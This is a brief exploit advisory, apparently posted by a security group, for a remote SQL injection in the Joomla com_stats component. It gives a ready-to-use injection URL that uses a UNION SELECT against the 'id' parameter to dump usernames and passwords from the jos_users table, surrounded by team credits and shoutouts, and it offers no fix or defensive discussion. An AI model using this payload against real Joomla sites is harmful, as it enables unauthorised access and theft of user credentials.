The Joomla com_stats component suffers from a remote SQL injection vulnerability.
77bd244f6bd8c8cfc5601bbcfd07bdce0fceb8b548e9e1a0d519609ff1e406b2
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N,
Joomla com_stat "id" Remote SQL Injection
index.php?option=com_stats&opt=viewteam&id=-100101110000/**/union/**/select/**/username,password,3,4,5,6,7,8/**/from/**/jos_users/*
(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1465)
AurA
Aria-Security Team
(Credits to Aria-Security Team)